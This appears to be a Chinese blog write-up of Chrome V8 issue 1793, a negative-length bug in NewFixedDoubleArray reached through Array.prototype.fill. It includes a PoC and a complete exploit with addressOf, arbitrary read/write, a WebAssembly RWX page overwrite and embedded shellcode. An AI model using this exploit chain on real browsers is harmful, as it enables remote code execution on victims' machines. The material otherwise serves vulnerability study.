Chrome issue-1793分析

已于 2023-07-12 12:06:42 修改
阅读量188 收藏
点赞数 2
文章标签: javascript 安全
于 2023-07-12 12:00:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/131676836
版权

环境配置

git reset --hard dd68954
gclient sync
tools/dev/v8gen.py x64.release
ninja -C out.gn/x64.release

漏洞分析

在v8/src/heap/factory.cc文件的NewFixedDoubleArray函数中可以发现开发人员对length进行了长度的检查,即DCHECK_LE(0, length)。但由于DCHECK只在debug中起作用,而在release中并不起作用,则该检查对正式版本并没有什么作用。如果length为负数,则会绕过if (length > FixedDoubleArray::kMaxLength)的检查,而由于int size = FixedDoubleArray::SizeFor(length)会使用length来计算出size,如果我们合理控制length,则可以让size计算出来为正数。

// v8/src/heap/factory.cc
Handle<FixedArrayBase> Factory::NewFixedDoubleArray(int length,PretenureFlag pretenure) {
  DCHECK_LE(0, length); // ***here***
  if (length == 0) return empty_fixed_array();
  //负数绕过检查
  if (length > FixedDoubleArray::kMaxLength) { 
    isolate()->heap()->FatalProcessOutOfMemory("invalid array length");
  }
  //计算出一个正数
  int size = FixedDoubleArray::SizeFor(length); // ***here***
  Map map = *fixed_double_array_map();
  //申请elements空间
  HeapObject result =
    AllocateRawWithImmortalMap(size, pretenure, map, kDoubleAligned);
  Handle<FixedDoubleArray> array(FixedDoubleArray::cast(result), isolate());
  array->set_length(length);
  return array;
}

// Garbage collection support.
inline static int SizeFor(int length) {
  return kHeaderSize + length * kDoubleSize;
}

在对length进行判断时,只判断了length的上限不大于maxlength,而并没有判断其下限,又因为传入的length参数类型是int,所以传入一个负数依然可以绕过检查,接着在下边的sizefor函数中,又会计算出一个正数的size。看一下sizefor的实现

// Garbage collection support.
inline static int SizeFor(int length) {
  return kHeaderSize + length * kDoubleSize;
}

如果传入的length为0x80000000,则经过计算返回的size为0x10+0x80000000*8=0x10。再调用AllocateRawWithImmortalMap则只会申请0x10的空间。

漏洞触发

在v8/src/builtins/builtins-array.cc文件中的ArrayPrototypeFill函数可以调用NewFixedDoubleArray函数。

BUILTIN(ArrayPrototypeFill) {
  HandleScope scope(isolate);
	
  if (isolate->debug_execution_mode() == DebugInfo::kSideEffects) {
    if (!isolate->debug()->PerformSideEffectCheckForObject(args.receiver())) {
      return ReadOnlyRoots(isolate).exception();
    }
  }

  // 1. Let O be ? ToObject(this value).
  //获取对象,返回值为receiver
  Handle<JSReceiver> receiver;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, receiver, Object::ToObject(isolate, args.receiver()));

  // 2. Let len be ? ToLength(? Get(O, "length")).
  //获取对象长度,返回值length
  double length;
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, length, GetLengthProperty(isolate, receiver));

  // 3. Let relativeStart be ? ToInteger(start).
  // 4. If relativeStart < 0, let k be max((len + relativeStart), 0);
  //    else let k be min(relativeStart, len).
  //获取开始长度start
  Handle<Object> start = args.atOrUndefined(isolate, 2);

  double start_index;
  //获取Start处的值start_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, start_index, GetRelativeIndex(isolate, length, start, 0));

  // 5. If end is undefined, let relativeEnd be len;
  //    else let relativeEnd be ? ToInteger(end).
  // 6. If relativeEnd < 0, let final be max((len + relativeEnd), 0);
  //    else let final be min(relativeEnd, len).
  Handle<Object> end = args.atOrUndefined(isolate, 3);

  double end_index;
  //获取end处的值end_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, end_index, GetRelativeIndex(isolate, length, end, length));

  if (start_index >= end_index) return *receiver;

  // Ensure indexes are within array bounds
  DCHECK_LE(0, start_index);
  DCHECK_LE(start_index, end_index);
  DCHECK_LE(end_index, length);

  Handle<Object> value = args.atOrUndefined(isolate, 1);
	//调用TryFastArrayFill,start_index和end_index都是double类型
  if (TryFastArrayFill(isolate, &args, receiver, value, start_index,
                       end_index)) {
    return *receiver;
  }
  return GenericArrayFill(isolate, receiver, value, start_index, end_index);
}

该函数首先获取args.receiver()对象,返回值为receiver对象。再获取receiver对象的长度,返回值为length。接着分别获取start和end,这里调用了GetRelativeIndex方法,该方法会触发用户自定义的JS函数,如果自定义函数可以修改其length,则可以造成oob。 

看一下GetRelativeIndex方法实现

V8_WARN_UNUSED_RESULT Maybe<double> GetRelativeIndex(Isolate* isolate,
                                                     double length,
                                                     Handle<Object> index,
                                                     double init_if_undefined) {
  double relative_index = init_if_undefined;
  if (!index->IsUndefined()) {
    Handle<Object> relative_index_obj;
    //ToInteger函数会触发自定义函数
    ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, relative_index_obj,
                                     Object::ToInteger(isolate, index),
                                     Nothing<double>());
    relative_index = relative_index_obj->Number();
  }

  if (relative_index < 0) {
    return Just(std::max(length + relative_index, 0.0));
  }

  return Just(std::min(relative_index, length));
}

可以发现其中调用了ToInteger方法,该方法可以调用自定义函数。

接着执行最后的TryFastArrayFill。

V8_WARN_UNUSED_RESULT bool TryFastArrayFill(
    Isolate* isolate, BuiltinArguments* args, Handle<JSReceiver> receiver,
    Handle<Object> value, double start_index, double end_index) {
  // If indices are too large, use generic path since they are stored as
  // properties, not in the element backing store.
  if (end_index > kMaxUInt32) return false;
  if (!receiver->IsJSObject()) return false;

  if (!EnsureJSArrayWithWritableFastElements(isolate, receiver, args, 1, 1)) {
    return false;
  }

  Handle<JSArray> array = Handle<JSArray>::cast(receiver);

  // If no argument was provided, we fill the array with 'undefined'.
  // EnsureJSArrayWith... does not handle that case so we do it here.
  // TODO(szuend): Pass target elements kind to EnsureJSArrayWith... when
  //               it gets refactored.
  if (args->length() == 1 && array->GetElementsKind() != PACKED_ELEMENTS) {
    // Use a short-lived HandleScope to avoid creating several copies of the
    // elements handle which would cause issues when left-trimming later-on.
    HandleScope scope(isolate);
    JSObject::TransitionElementsKind(array, PACKED_ELEMENTS);
  }

  DCHECK_LE(start_index, kMaxUInt32);
  DCHECK_LE(end_index, kMaxUInt32);

  uint32_t start, end;
  CHECK(DoubleToUint32IfEqualToSelf(start_index, &start));
  CHECK(DoubleToUint32IfEqualToSelf(end_index, &end));

  ElementsAccessor* accessor = array->GetElementsAccessor();
  accessor->Fill(array, value, start, end);							// 调用具体的Fill函数来进行填充
  return true;
}

在最后执行Fill函数。v8/src/elements.cc

static Object FillImpl(Handle<JSObject> receiver, Handle<Object> obj_value, uint32_t start, uint32_t end) {
  // Ensure indexes are within array bounds
  DCHECK_LE(0, start);
  DCHECK_LE(start, end);

  // Make sure COW arrays are copied.
  if (IsSmiOrObjectElementsKind(Subclass::kind())) {
    JSObject::EnsureWritableFastElements(receiver);
  }

  // Make sure we have enough space.
  uint32_t capacity =
      Subclass::GetCapacityImpl(*receiver, receiver->elements());
  if (end > capacity) {
    Subclass::GrowCapacityAndConvertImpl(receiver, end); // ***here***
    CHECK_EQ(Subclass::kind(), receiver->GetElementsKind());
  }

首先判断start和end的关系,然后获取当前对象数组的容量capacity,判断end和capacity,如果end大,则需要调用GrowCapacityAndConvertImpl增加数组容量。该函数最终会调用到 ConvertElementsWithCapacity

// /home/ruan/v8_build/v8_src/v8/src/elements.cc 
static Handle<FixedArrayBase> ConvertElementsWithCapacity(
      Handle<JSObject> object, Handle<FixedArrayBase> old_elements,
      ElementsKind from_kind, uint32_t capacity, uint32_t src_index,
      uint32_t dst_index, int copy_size) {
    Isolate* isolate = object->GetIsolate();
    Handle<FixedArrayBase> new_elements;
    if (IsDoubleElementsKind(kind())) {
      new_elements = isolate->factory()->NewFixedDoubleArray(capacity);					// (11)
    } else {
      new_elements = isolate->factory()->NewUninitializedFixedArray(capacity);
    }

    int packed_size = kPackedSizeNotKnown;
    if (IsFastPackedElementsKind(from_kind) && object->IsJSArray()) {
      packed_size = Smi::ToInt(JSArray::cast(*object)->length());
    }

    Subclass::CopyElementsImpl(isolate, *old_elements, src_index, *new_elements,
                               from_kind, dst_index, packed_size, copy_size);

    return new_elements;
  }

可以看到这里会调用NewFixedDoubleArray触发漏洞。

漏洞利用

首先给出poc

// test on d8 release version
array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;
}});
let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8); 
%DebugPrint(array);
%DebugPrint(a);
%DebugPrint(ab);
%SystemBreak();

 打印array的内存,找到其elements地址

打印array的elements的内存

 

发现本该都是1.1的值,但是前边array-->elements的部分区域被a和ab的内存覆盖了。那么我们就可以通过修改array--->elements来修改a和ab的内存区域,从而达到任意地址读写的效果。

exp

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
var Uint32 = new Int32Array(buf);

function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}

function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}


function hex(i){
    return '0x' + i.toString(16).padStart(16, '0');
}

array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;

}});
let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8);


let idx = arr.indexOf(i2f(0x1234567800000000n)); 
function addressOf(obj)
{
    a[0] = obj;         
    return f2i(arr[idx]);
}

let backstore_ptr_idx = arr.indexOf(i2f(8n)) + 1; 
function arb_read(addr)
{
    arr[backstore_ptr_idx] = i2f(addr);
    let dv = new DataView(ab); 
    return f2i(dv.getFloat64(0,true)) 
}

function arb_write(addr,data)
{
    arr[backstore_ptr_idx] = i2f(addr);
    let ua = new Uint8Array(ab); 
    ua.set(data);
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var wasm_instance_addr = addressOf(wasmInstance) - 1n;
console.log("[+]leak wasm instance addr: " + hex(wasm_instance_addr));
var rwx_page_addr = arb_read(wasm_instance_addr + 0x108n);
console.log("[+]leak rwx_page_addr: " + hex(rwx_page_addr));

const sc = [72, 49, 201, 72, 129, 233, 247, 255, 255, 255, 72, 141, 5, 239, 255, 255, 255, 72, 187, 124, 199, 145, 218, 201, 186, 175, 93, 72, 49, 88, 39, 72, 45, 248, 255, 255, 255, 226, 244, 22, 252, 201, 67, 129, 1, 128, 63, 21, 169, 190, 169, 161, 186, 252, 21, 245, 32, 249, 247, 170, 186, 175, 21, 245, 33, 195, 50, 211, 186, 175, 93, 25, 191, 225, 181, 187, 206, 143, 25, 53, 148, 193, 150, 136, 227, 146, 103, 76, 233, 161, 225, 177, 217, 206, 49, 31, 199, 199, 141, 129, 51, 73, 82, 121, 199, 145, 218, 201, 186, 175, 93];
for(let i = 0; i < sc.length / 8; i++ ){
    arb_write(rwx_page_addr + BigInt(i) * 8n ,sc.slice(i * 8,(i + 1) * 8));
}

f();

 成功弹出计算器。

参考

Chrome issue-1793分析-安全客 - 安全资讯平台 (anquanke.com)

Chrome issue 1793 分析 | ruan (ruan777.github.io)

KingKi1L3r
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全】简要分析Chrome-V8-Issue-762874
HBohan的博客
11-29 225
这是A guided tour through Chrome’s javascript compiler上的第二个漏洞,下面是对应的commit 环境搭建 用v8-action env: PATCH_FLAG: true COMMIT: d2da19c78005c75e0f658be23c28b473dd76b93b #这里 DEPOT_UPLOAD: false SRC_UPLOAD: true BINARY_UPLOAD: false 编译 cd v8 tools/dev/v8
issue-translator-extension:Chrome扩展程序-为非英语语言的程序员翻译GitHub上的问题,提取请求和评论
01-30
issue-translator-extension】是一款专为非英语背景的程序员设计的Chrome浏览器扩展程序,它旨在帮助用户翻译GitHub上的问题(issues)、拉取请求(pull requests)以及相关的评论内容。这款扩展利用了强大的翻译...
Chrome dev tool issue
zhuchuji的博客
06-11 382
Chrome dev tool issue
Chrome漏洞分析与利用(三)——Issue-1062091漏洞分析
Anansi的博客
04-12 1116
漏洞环境 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。 这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,这个提交中的漏洞恰好移动到了实验版本命令行标志的后面。但是,这个更改位于Chrome 82.0.4065.0版本中,因此该漏洞在Chrome稳定版本81的所有桌面平台上都是可以利用的。 环境配置 一开始打算像调试v8漏洞那样尝试用fetc
新版本chrome浏览器带来的跨域请求cookie丢失问题
qq_16059847的博客
09-27 5330
今天线上业务的跨域接口请求莫名的出现问题,经深入排查,发现新版本的chrome浏览器(80版本之后)对cookie的校验更加严格,SameSite属性默认值由None变为Lax,因此可能会对线上业务带来问题特此与大家同步一下今天的发现,存在跨域接口调用业务的小伙伴可能需要关注。 chrome升级到80版本之后(准确的说是78版本之后,灰度测试,如上图,即也可能存在同一版本不同人的浏览器表现不同),cookie的SameSite属性默认值由None变为Lax,该问题的讨论可参考:https://githu
简要分析Chrome-V8-Issue-762874
xxwn202302的博客
07-26 49
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Chrome漏洞分析与利用(十三)——issue-1182647(CVE 2021-21195)漏洞分析
Anansi的博客
11-25 648
由于调用了gc函数,所以在使用d8执行时需要加上–expose-gc 参数,执行后。
aria-issue-autofix:Chrome 扩展,自动修复咏叹调问题
06-13
"aria-issue-autofix:Chrome 扩展,自动修复咏叹调问题" 这个标题提到了一个名为 "aria-issue-autofix" 的 Chrome 浏览器扩展,它的主要功能是自动修复与咏叹调(Aria)相关的问题。Aria,全称 Accessible Rich ...
wps-issue-157-repro
02-22
在深入研究这个问题时,首先需要按照README中的指示设置和运行项目,然后使用开发者工具(如Chrome DevTools)来调试JavaScript代码,查看错误日志,分析性能瓶颈。如果问题涉及到第三方库,可能需要查阅其文档或在...
【技术分享】Chrome Issue 776677(CVE-2017-15399)asm.js UAF漏洞分析 .pdf
09-05
Chrome Issue 776677(CVE-2017-15399):asm.js Use-After-Free 漏洞分析】 在Web安全领域,Chrome Issue 776677(CVE-2017-15399)是一个重要的安全事件,它涉及到asm.js(Assembly JavaScript)中的Use-After-...
chrome issue 1051017 v8 逃逸 .pdf
09-05
【标题】:Chrome Issue 1051017:V8引擎中的逃逸漏洞详解 【描述】:本文将深入探讨Chrome浏览器中出现的Issue 1051017,这是一个与V8 JavaScript引擎相关的安全问题,涉及逃逸漏洞。此问题在2020年2月被公开,...
Vue前端打包
weixin_63680330的博客
07-04 273
介绍:Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器。其特点是占有内存少,并发能力强,在各大型互联网公司都有非常广泛的使用。启动:双击nginx.exe 文件启动,服务器默认占用80端口。官网:https://nginx.org/打包好的dist目录赋值到html下。html静态资源文件目录。conf 配置文件目录。logs日志文件目录。temp临时文件目录。
Vue 3集成krpano 全景图展示
最新发布
Mr丶GUO
07-06 292
Vue 3集成krpano 全景图展示,需要借助官方工具进行制作注意事项:vue@cli3没有static,需要放在public目录下。
JS混淆基本类型和原理
朴拙科技的博客
07-06 494
混淆技术为JS代码提供了一定程度的保护,但同时也给代码的维护和逆向工程带来了挑战。了解和掌握这些混淆技术的原理和解析方法,可以帮助开发者更好地保护或理解JS代码。然而,需要注意的是,混淆并不是万无一失的安全措施,它更多的是增加了攻击者理解代码的难度。在进行逆向工程时,应始终遵守法律法规,尊重知识产权,不要用于非法目的。
Vue 数据大屏适配
FitnessSnail的博客
07-02 283
不会因为在某一维度上缩放过大而导致元素在另一维度上超出视口。.dataScreen-content 盒子内容根据设计稿给的。(默认为 1920x1080)计算缩放比例,并。的缩放比例,那么元素可能会在某一维度上。,这在很多情况下是不希望发生的。的缩放比例的目的是为了保证。单位进行正常的布局就行。在水平和垂直方向上都。
vue3+ts项目中.env配置环境变量与情景配置
我愿化作繁星
07-03 892
就是在编码过程中应用这些自定义环境变量的时候,给出的智能提示。src目录下创建一个或者env.d.ts文件src同级别types目录下创建文件env.d.ts// 更多环境变量...在文件中专门用于处理项目src文件中的TypeScript配置文件,include配置项加入文件:(会提示自定义设置的环境变量)// ...// 第一种方式对应配置"vite-env.d.ts", // 或者 "env.d.ts"// 第二种方式对应配置。
【VUE】 深入理解 Vue 动态路由:简介、实际开发场景与代码示例
九日的博客
07-04 345
在传统的路由配置中,我们需要在初始化 Vue 实例时定义所有的路由。但在实际应用中,特别是涉及权限管理、模块懒加载等场景,我们可能需要根据用户的权限或其它条件动态添加或修改路由。Vue Router 提供的动态路由功能正是为了解决这些问题。
chrome --remote-debugging-port=9222
09-18
chrome --remote-debugging-port=9222 是一个 Chrome 浏览器的命令行参数。它的作用是设置 Chrome 浏览器开启远程调试的端口号为9222。 远程调试是一种运行 Chrome 浏览器时,通过与开发工具(如 Chrome DevTools)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值